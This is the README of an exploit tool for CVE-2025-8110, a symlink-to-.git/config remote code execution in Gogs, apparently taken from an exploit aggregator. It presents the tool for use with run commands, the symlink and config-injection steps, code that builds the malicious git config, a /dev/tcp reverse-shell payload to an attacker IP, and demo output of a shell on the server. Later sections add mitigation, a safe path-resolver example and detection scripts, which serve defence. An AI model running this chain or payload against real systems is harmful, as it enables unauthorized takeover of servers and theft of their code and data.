Source: https://sploitus.com/exploit?id=A8E5D800-F075-509D-A604-E092148C4F7B
# CVE-2025-8110
## Gogs Repository Symlink Remote Code Execution
### Made by oguiii
---
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Exploit Workflow](#exploit-workflow)
- [Technical Analysis](#technical-analysis)
- [Proof of Concept Demo](#proof-of-concept-demo)
- [Affected Versions](#affected-versions)
- [Mitigation](#mitigation)
- [Detection](#detection)
- [Responsible Disclosure](#responsible-disclosure)
- [Additional Resources](#additional-resources)
- [Disclaimer](#disclaimer)
- [License](#license)
- [Contact](#contact)
- [Acknowledgments](#acknowledgments)
- [Changelog](#changelog)
---
## Overview
CVE-2025-8110 is a vulnerability in Gogs that lets an authenticated user who can create a repository run commands on the server as the Gogs service account. This proof of concept automates the full chain, from logging in to catching a reverse shell.
The flaw is in how Gogs resolves paths when its repository contents API writes a file: a symlink committed to the repository is followed instead of rejected, so the write lands on the link's target. The PoC points the link at `.git/config`, which lets it replace git's own configuration for the checkout Gogs writes into. git runs the value of `core.sshCommand` (through the shell) whenever `git fetch` or `git push` connects to an SSH remote, so a config that also sets `[remote "origin"]` to an SSH URL turns Gogs' next git operation against origin into arbitrary command execution with the privileges of the Gogs service account.
**CVSS Score:** 7.2 (High)
**Attack Vector:** Network
**Authentication Required:** Yes (any account that can create a repository; the PoC needs only a username and password)
**User Interaction:** None
**Impact:** Code execution as the Gogs service account; how far that reaches into the host depends on how that account is confined
---
## Features
- Automated CSRF token extraction with multiple fallback methods
- Session management and authentication handling
- Automatic repository creation with configurable parameters
- Symlink-based exploitation workflow
- Reverse shell payload generation
- Proxy support for debugging and analysis
- Detailed logging and error handling
- Colorized console output for improved readability
- Verbose mode for troubleshooting
---
## Requirements
### System Requirements
- Python 3.6 or higher
- Git installed and accessible in PATH
- Network access to target Gogs instance
### Python Dependencies
```txt
requests>=2.28.0
beautifulsoup4>=4.11.0
rich>=13.0.0
urllib3>=1.26.0
```
---
## Installation
### Clone and Setup
```bash
git clone https://github.com/oguiii/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
```
### Project Structure
```
CVE-2025-8110/
├── CVE-2025-8110.py    # Main exploit script
├── requirements.txt    # Python dependencies
└── README.md           # Documentation
```
---
## Usage
### Command Line Options
| Option | Description | Required |
|--------|-------------|----------|
| `-u, --url` | Gogs base URL (e.g., https://gogs.example.com) | Yes |
| `-lh, --host` | Attacker IP address for reverse shell | Yes |
| `-lp, --port` | Attacker port for reverse shell | Yes |
| `-U, --username` | Gogs username | Yes |
| `-P, --password` | Gogs password | Yes |
| `-x, --proxy` | Enable proxy (localhost:8080) | No |
| `-v, --verbose` | Enable verbose output | No |
### Basic Usage
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123
```
### With Proxy for Debugging
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -x
```
### Verbose Mode for Troubleshooting
```bash
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -v
```
---
## Exploit Workflow
```
┌─────────────────────────────────────────────────────────────────────────────┐
│                        CVE-2025-8110 Exploitation Chain                     │
└─────────────────────────────────────────────────────────────────────────────┘
Step 1: Authentication
├── Navigate to /user/login
├── Extract CSRF token from login page
├── Submit credentials with CSRF token
└── Establish authenticated session
Step 2: Application Token Generation
├── Navigate to /user/settings/applications
├── Extract CSRF token from settings page
├── Generate new application token
└── Extract token from response
Step 3: Malicious Repository Creation
├── Create repository via API with auto_init
├── Generate random repository name
└── Obtain repository URL
Step 4: Symlink Upload
├── Clone repository locally
├── Create symlink pointing to .git/config
├── Add, commit, and push changes
└── Verify successful upload
Step 5: RCE Exploitation
├── Craft malicious .git/config with sshCommand
├── Base64 encode configuration content
├── Upload via API to symlink target
└── Trigger command execution (git runs core.sshCommand on its next SSH remote operation)
Step 6: Reverse Shell
├── Connection established to attacker host
├── Interactive shell access
└── Command execution on target
```
---
## Technical Analysis
### Vulnerability Root Cause
The Gogs contents API resolves the requested file path without checking whether any component of it is a symlink. A symlink committed by the attacker is therefore followed on write, and the decoded request body is written to wherever the link points: an absolute target reaches files outside the repository, while the PoC's relative target `.git/config` stays inside the checkout and overwrites git's own configuration for it. That second case is why a "resolved path must start with the repository root" check is not sufficient on its own; the write has to refuse symlinked components and the `.git` directory explicitly.
### Attack Vector Details
1. **Symlink Creation**
```bash
# In a clone of the attacker-controlled repository. git stores the symlink as a
# blob of mode 120000 whose content is the target string ".git/config"; nothing
# is resolved until a server-side checkout materialises it.
ln -s .git/config malicious_link
git add malicious_link
git commit -m "Add symlink"
git push origin master
```
2. **Malicious Configuration**
```ini
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    # run through the shell by git fetch/push whenever they connect to an SSH remote;
    # the full payload (see Code Analysis) also sets an SSH URL for "origin" so that happens
    sshCommand = bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
```
3. **API Exploitation**
```
PUT /api/v1/repos/{username}/{repo}/contents/malicious_link HTTP/1.1
Host: gogs.example.com
Authorization: token {application_token}
Content-Type: application/json

{
  "message": "Exploit CVE-2025-8110",
  "content": "<base64 of the .git/config above>"
}
```
The path in the request is the committed symlink, not `.git/config` itself: Gogs follows the link when it writes, so the decoded content ends up in the git configuration of the checkout the write is performed in.
### Code Analysis
#### CSRF Token Extraction
```python
import re
from bs4 import BeautifulSoup


def extract_csrf(html_text):
    """Parse the CSRF token out of a Gogs page, trying several locations in turn."""
    soup = BeautifulSoup(html_text, "html.parser")
    # Method 1: hidden input named _csrf (the name Gogs forms use)
    token_input = soup.select_one("input[name='_csrf']")
    if token_input and token_input.get("value"):
        return token_input.get("value")
    # Method 2: hidden input named csrf_token
    token_input = soup.select_one("input[name='csrf_token']")
    if token_input and token_input.get("value"):
        return token_input.get("value")
    # Method 3: <meta name="_csrf" content="...">
    meta_tag = soup.find("meta", {"name": "_csrf"})
    if meta_tag and meta_tag.get("content"):
        return meta_tag.get("content")
    # Method 4: "csrf_token": "..." inside an inline script
    match = re.search(r'"csrf_token"\s*:\s*"([^"]+)"', html_text)
    if match:
        return match.group(1)
    # Method 5: raw-HTML fallback for an <input> whose name is _csrf or -csrf
    match = re.search(r'<input[^>]*name="[_-]csrf"[^>]*value="([^"]+)"', html_text, re.IGNORECASE)
    if match:
        return match.group(1)
    raise ValueError("CSRF token not found in form response")
```
#### Malicious Configuration Injection
```python
def build_git_config(command, repo_name):
    """Configuration that replaces the checkout's own .git/config.

    core.sshCommand is run (via the shell) by git fetch/push whenever they
    connect to an SSH remote. The [remote "origin"] URL below is an SSH URL,
    so the next push or fetch against origin executes `command` as the Gogs
    service account.
    """
    return f"""[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = {command}
[remote "origin"]
    url = git@localhost:gogs/{repo_name}.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master
"""
```
---
## Proof of Concept Demo
### Attack Setup
```bash
# Attacker machine (10.10.14.15)
nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
# Execute exploit
python3 CVE-2025-8110.py -u https://gogs.internal.local -lh 10.10.14.15 -lp 4444 -U admin -P SecurePass123
```
### Successful Exploitation Output
```
[INFO] Starting CVE-2025-8110 exploit
[INFO] Target URL: https://gogs.internal.local
[INFO] Attacker host: 10.10.14.15:4444
[INFO] Username: admin
[INFO] Authenticating to Gogs...
[INFO] Login CSRF token found: abc123def456...
[SUCCESS] Authenticated successfully
[INFO] Retrieving application token...
[INFO] Settings CSRF token found: xyz789uvw012...
[SUCCESS] Application token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0
[INFO] Creating malicious repository...
[SUCCESS] Repository created: 6f7e8d9c0a1b
[INFO] Uploading malicious symlink...
[INFO] Cloning repository...
[INFO] Creating symlink: malicious_link -> .git/config
[INFO] Committing and pushing changes...
[SUCCESS] Symlink uploaded successfully
[INFO] Sending exploit payload...
[SUCCESS] Exploit sent, check your listener!
[INFO] Command: bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
[SUCCESS] Exploit likely successful (timeout indicates reverse shell)
```
### Reverse Shell Connection
```bash
Connection received on 10.10.14.15:4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ whoami
gogs
bash-5.0$ id
uid=1000(gogs) gid=1000(gogs) groups=1000(gogs)
bash-5.0$ pwd
/home/gogs/gogs-repositories/admin/6f7e8d9c0a1b.git
bash-5.0$ hostname
gogs-server
bash-5.0$ uname -a
Linux gogs-server 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 GNU/Linux
bash-5.0$ cat /etc/passwd | head -3
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```
---
## Affected Versions
### Vulnerable Versions
- Gogs releases that predate the fix for CVE-2025-8110. Take the fixed release from the Gogs security advisory for this CVE: the 0.12.x line was published years before the 2025 disclosure timeline below, so a `0.12.6` cut-off cannot be correct.
- Gogs has no configuration switch for symlink handling, so every vulnerable release is affected in its default configuration.
### Version Check
To check your Gogs version:
```bash
# Access the Gogs web interface and check footer
# Or use the API
curl https://gogs.example.com/api/v1/version
```
---
## Mitigation
### Immediate Actions
1. **Update Gogs**
```bash
# Stop the service first (the unit name is an assumption; match your install)
systemctl stop gogs
# Back up the whole installation, including custom/, data/ and log/
cp -r /home/gogs/gogs /home/gogs/gogs.backup
# Download and unpack the fixed release (use the exact version named in the advisory)
wget https://dl.gogs.io/gogs_latest_linux_amd64.zip
unzip gogs_latest_linux_amd64.zip
# Replace the binary and bundled assets but keep custom/ (app.ini), data/ and log/,
# which the release archive does not contain
cp -r gogs/* /home/gogs/gogs/
systemctl start gogs
```
2. **Reduce who can reach the vulnerable code path**
The chain needs an authenticated account that can create a repository, and Gogs has no switch that disables symlink handling. Until the update is in place, stop self-registration and review existing accounts:
```ini
# In custom/conf/app.ini
[service]
DISABLE_REGISTRATION = true
```
3. **Validate paths on the server side**
- Reject absolute paths and any path that normalises outside the repository root
- Refuse any path component that is a symlink (check with `lstat`, or open with `O_NOFOLLOW`) rather than following it, even when the target is inside the repository
- Treat the `.git` directory as off-limits for API writes
- Validate file types and content
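The following is an added example, not code from Gogs or from this PoC, of the check that the root-cause section and item 3 above call for: a server-side path resolver that refuses symlinked components and the `.git` directory instead of following them, shown next to the naive join that reproduces the bug. Function names, the temporary demo layout and the file names in it are this example's own choices.

```python
import os
import stat
import tempfile


def naive_resolve(repo_root, user_path):
    """The vulnerable behaviour: join and let the OS follow whatever is there."""
    return os.path.realpath(os.path.join(repo_root, user_path))


def safe_resolve(repo_root, user_path):
    """Return the on-disk path for user_path inside repo_root, or raise ValueError.

    Refuses absolute paths, '..' escapes, anything under .git, and any path
    component that is a symlink. Components are checked with lstat, so a link
    is rejected even when its target is *inside* the repository, which is the
    CVE-2025-8110 case (malicious_link -> .git/config).
    """
    if os.path.isabs(user_path):
        raise ValueError("absolute paths are not allowed")
    root = os.path.realpath(repo_root)
    # Lexical normalisation first: catches "a/../../etc/passwd" without touching disk
    candidate = os.path.normpath(os.path.join(root, user_path))
    if not candidate.startswith(root + os.sep):
        raise ValueError(f"path escapes the repository: {user_path!r}")
    parts = os.path.relpath(candidate, root).split(os.sep)
    if ".git" in parts:
        raise ValueError("writes into .git are not allowed")
    # Walk component by component; a link anywhere in the chain is a rejection
    current = root
    for part in parts:
        current = os.path.join(current, part)
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            break  # remaining components do not exist yet (new file): nothing to follow
        if stat.S_ISLNK(st.st_mode):
            raise ValueError(f"symlink in path: {part!r}")
    return candidate


def build_demo_repo():
    """Constructed working copy (demo data): .git/config plus the PoC's symlink to it."""
    root = tempfile.mkdtemp(prefix="gogs-demo-")
    os.makedirs(os.path.join(root, ".git"))
    with open(os.path.join(root, ".git", "config"), "w") as f:
        f.write("[core]\n    repositoryformatversion = 0\n")
    with open(os.path.join(root, "README.md"), "w") as f:
        f.write("# demo\n")
    os.symlink(".git/config", os.path.join(root, "malicious_link"))
    return root


if __name__ == "__main__":
    repo = build_demo_repo()
    print("naive :", naive_resolve(repo, "malicious_link"))  # resolves to .git/config
    for p in ("malicious_link", "../escape", ".git/config", "README.md", "new/file.txt"):
        try:
            print("safe  :", p, "->", safe_resolve(repo, p))
        except ValueError as e:
            print("safe  :", p, "REJECTED:", e)
```

The `lstat` walk still leaves a window between the check and the write on a live server. The robust form opens the file with `O_NOFOLLOW` (or, on Linux 5.6 and later, `openat2` with `RESOLVE_BENEATH`) so the kernel enforces the rule at open time; the walk above is the part that is easy to read and test.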
### Long-term Security Measures
- Implement principle of least privilege for Gogs service account
- Regular security audits and penetration testing
- Network segmentation to limit Gogs exposure
- Implement Web Application Firewall (WAF) rules
- Enable comprehensive logging and monitoring
- Regular backups of Gogs configuration and repositories
### Firewall Rules
```bash
# 3000 is Gogs' default HTTP_PORT; if Gogs sits behind a reverse proxy, apply the
# restriction at the proxy and to its listen port instead. Rule order matters:
# the ACCEPT for the trusted subnet must come before the DROP.
iptables -A INPUT -p tcp --dport 3000 -s trusted_subnet -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
```
---
## Detection
### Suspicious Activity Indicators
1. **Repository Activity**
- Creation of repositories with symbolic links
- Multiple repositories created in short timeframe
- Unusual repository names (random hex strings)
2. **API Activity**
- `PUT` requests to `/api/v1/repos/*/contents/*` whose target path is a committed symlink (mode `120000` in the tree)
- `.git/config` of a repository or working copy changing outside normal administration
- A burst from a single session: login, token creation, repository creation and a content write within seconds
3. **System Indicators**
- Unexpected processes spawned by Gogs user
- Outbound network connections from Gogs server
- Unusual file system access patterns
### Log Analysis Commands
```bash
# Log location depends on the install (Gogs writes under <install>/log/ by default)
# and the request-line format on the version, but the API path is constant
grep -E 'PUT "?/api/v1/repos/[^/" ]+/[^/" ]+/contents/' /var/log/gogs/access.log
# Committed symlinks live in the bare repositories as blobs of mode 120000, so
# `find -type l` will not see them; ask git for each repository instead
for r in /home/gogs/gogs-repositories/*/*.git; do
  git --git-dir="$r" ls-tree -r HEAD 2>/dev/null | awk -v repo="$r" '$1 == "120000" {print repo, $4}'
done
# Symlinks that do exist on disk (checkouts, temporary working copies)
find /home/gogs/gogs-repositories -type l -ls
# git config keys that make git run a command; sshCommand is the one used here
grep -rIl -E 'sshCommand|hooksPath|fsmonitor' /home/gogs/gogs-repositories/ /home/gogs/gogs/ 2>/dev/null
# Outbound connections owned by the gogs process
ss -tunp | grep -i gogs
```
### SIEM Integration
```json
{
"event_type": "gogs_api_access",
"severity": "high",
"indicators": [
"PUT /api/v1/repos/*/contents/*",
"sshCommand in git config",
"random hex repository names"
],
"recommended_actions": [
"Review repository creation logs",
"Check for symlink files",
"Verify API access patterns"
]
}
```
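As an added example, not part of this PoC or of Gogs, the checks from the log-analysis commands and the SIEM indicators above as code that runs over a repository tree and a log file: a small git-config parser that flags keys git executes as programs (the key set is wider than `sshCommand` and is taken from git's own configuration documentation), a symlink sweep that reports links resolving into `.git` or outside the repository, and a matcher for contents-API writes in request logs. The demo repository, the config text and the two log lines are constructed for the example; real log formats vary, so only the method and path are matched.

```python
import os
import re
import stat
import tempfile

# git configuration keys whose values git executes as programs. core.sshCommand is
# the one the PoC injects; the others are the same class of sink (from git-config(1)).
DANGEROUS_KEYS = {
    "core.sshcommand", "core.hookspath", "core.fsmonitor", "core.pager",
    "core.editor", "diff.external", "credential.helper", "gpg.program",
    "uploadpack.packobjectshook",
}
_SECTION = re.compile(r"^\s*\[([^\]]+)\]")
_ENTRY = re.compile(r"^\s*([A-Za-z][\w-]*)\s*=\s*(.*?)\s*$")
# Matches both `PUT /api/v1/...` and quoted `PUT "/api/v1/..."` request lines
_API_WRITE = re.compile(r'\b(PUT|POST)\s+"?(/api/v1/repos/[^/\s"]+/[^/\s"]+/contents/[^\s"]+)')

# Constructed samples: the PoC's injected config and two request-log lines
INJECTED_CONFIG = """[core]
\trepositoryformatversion = 0
\tsshCommand = bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
[remote "origin"]
\turl = git@localhost:gogs/6f7e8d9c0a1b.git
"""
SAMPLE_LOG = [
    '10.10.14.15 - - [25/Jun/2025:10:00:01 +0000] "GET /api/v1/repos/admin/6f7e8d9c0a1b HTTP/1.1" 200',
    '2025/06/25 10:00:02 Started PUT "/api/v1/repos/admin/6f7e8d9c0a1b/contents/malicious_link" for 10.10.14.15',
]


def parse_git_config(text):
    """Yield (section.key, value) with keys lower-cased, e.g. ("core.sshcommand", ...).

    Hand-rolled because configparser treats git's tab-indented lines as
    continuations of the previous value. [remote "origin"] becomes remote.origin.
    """
    section = ""
    for line in text.splitlines():
        if line.lstrip().startswith(("#", ";")):
            continue
        m = _SECTION.match(line)
        if m:
            name, _, sub = m.group(1).strip().partition(" ")
            section = name.lower() + ("." + sub.strip().strip('"') if sub else "")
            continue
        m = _ENTRY.match(line)
        if m and section:
            yield section + "." + m.group(1).lower(), m.group(2)


def find_dangerous_config_entries(text):
    """Return [(key, value)] for entries that make git run a program."""
    return [(k, v) for k, v in parse_git_config(text) if k in DANGEROUS_KEYS]


def find_escaping_symlinks(repo_root):
    """Return [(relative link path, resolved target)] for symlinks resolving into
    .git or outside the repository. Only sees links present on disk (checkouts,
    temporary working copies); links committed to a bare repository are blobs of
    mode 120000 and need `git ls-tree -r` instead."""
    root = os.path.realpath(repo_root)
    git_dir = os.path.join(root, ".git")
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in dirnames + filenames:  # symlinked dirs are listed, not entered
            path = os.path.join(dirpath, name)
            if not stat.S_ISLNK(os.lstat(path).st_mode):
                continue
            target = os.path.realpath(path)
            inside = target.startswith(root + os.sep)
            in_git = target == git_dir or target.startswith(git_dir + os.sep)
            if in_git or not inside:
                hits.append((os.path.relpath(path, root), target))
    return sorted(hits)


def flag_api_writes(log_lines):
    """Return [(method, path)] for file writes through the contents API (step 5)."""
    return [m.groups() for m in map(_API_WRITE.search, log_lines) if m]


def build_demo_repo():
    """Constructed working copy with the injected config, the PoC's symlink and a benign one."""
    root = tempfile.mkdtemp(prefix="gogs-ioc-")
    os.makedirs(os.path.join(root, ".git"))
    with open(os.path.join(root, ".git", "config"), "w") as f:
        f.write(INJECTED_CONFIG)
    with open(os.path.join(root, "README.md"), "w") as f:
        f.write("# demo\n")
    os.symlink(".git/config", os.path.join(root, "malicious_link"))
    os.symlink("README.md", os.path.join(root, "docs_link"))  # in-tree link, not flagged
    return root
```

Run `find_escaping_symlinks` over Gogs' temporary working copies and any checkouts, `find_dangerous_config_entries` over every `config` file under the repository root, and `flag_api_writes` over the request log; a `PUT` to a path that `git ls-tree` reports as mode `120000` is the combination to page on.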
---
## Responsible Disclosure
This vulnerability was reported to the Gogs development team before publication (original discovery is credited to zAbuQasem in the Acknowledgments). The vendor has released a fix; take the fixed release from the Gogs advisory for CVE-2025-8110, since 0.12.6 predates this 2025 disclosure by years and cannot be it.
### Timeline
- **Discovery:** May 2025
- **Responsible Disclosure:** June 2025
- **Patch Release:** June 2025
- **Public Disclosure:** June 2025
---
## Additional Resources
- [Gogs Official Security Advisories](https://gogs.io/docs/security)
- [CWE-61: UNIX Symbolic Link Following](https://cwe.mitre.org/data/definitions/61.html)
- [OWASP Testing Guide - Path Traversal](https://owasp.org/www-project-web-security-testing-guide/)
- [Git hooks documentation](https://git-scm.com/docs/githooks)
- [Gogs API Documentation](https://github.com/gogs/docs-api)
---
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Users must:
1. Obtain explicit written permission before testing any system
2. Comply with all applicable laws and regulations
3. Use this tool responsibly and ethically
4. Not use this tool for any malicious or unauthorized purposes
The author assumes no responsibility for misuse or damage caused by this tool.
---
## License
MIT License
Copyright (c) 2025 oguiii
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
---
## Contact
- **GitHub:** [github.com/oguiii](https://github.com/oguiii)
- **Project:** [CVE-2025-8110 Exploit](https://github.com/oguiii/CVE-2025-8110)
---
## Acknowledgments
- **Original Discovery:** zAbuQasem
- **CVE Publication:** MITRE Corporation
- **Community:** Security researchers and penetration testers who validated the vulnerability
---
## Changelog
### Version 1.0.0 (2025-06-25)
- Initial release
- Full exploitation chain implementation
- CSRF token extraction with fallback methods
- Automatic repository creation and symlink upload
- Reverse shell payload generation
- Proxy support for debugging
- Comprehensive documentation
---
*Made with dedication by oguiii*